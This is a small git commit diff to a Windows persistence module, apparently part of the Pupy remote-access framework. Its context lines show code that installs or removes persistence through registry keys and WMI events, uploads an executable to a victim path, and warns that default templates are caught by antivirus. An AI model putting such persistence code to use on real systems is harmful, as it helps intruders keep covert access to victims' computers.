Oleksii Shevchuk 2017-07-01 12:46:39 +03:00
parent bd13f36497
commit 56443dd9cd
1 changed files with 3 additions and 4 deletions

View File

@ -94,7 +94,7 @@ class PersistenceModule(PupyModule):
self.info("persistence removed !")
else:
self.error("error removing registry persistence")
# removing persistency from wmi event
elif args.method=="wmi":
self.info("removing wmi event ...")
@ -127,11 +127,12 @@ class PersistenceModule(PupyModule):
pos+=chunk_size
rf.close()
self.success("upload successful")
cmd = remote_path
elif args.cmd:
cmd = args.cmd
else:
self.error("A command line or an executable is needed on windows (standard templates will get caught by the AV)")
return
return
if args.method=="registry":
@ -150,5 +151,3 @@ class PersistenceModule(PupyModule):
self.success("persistence added using wmi!")
else:
self.error("an error occured creating the wmi persistence, try to do it manually")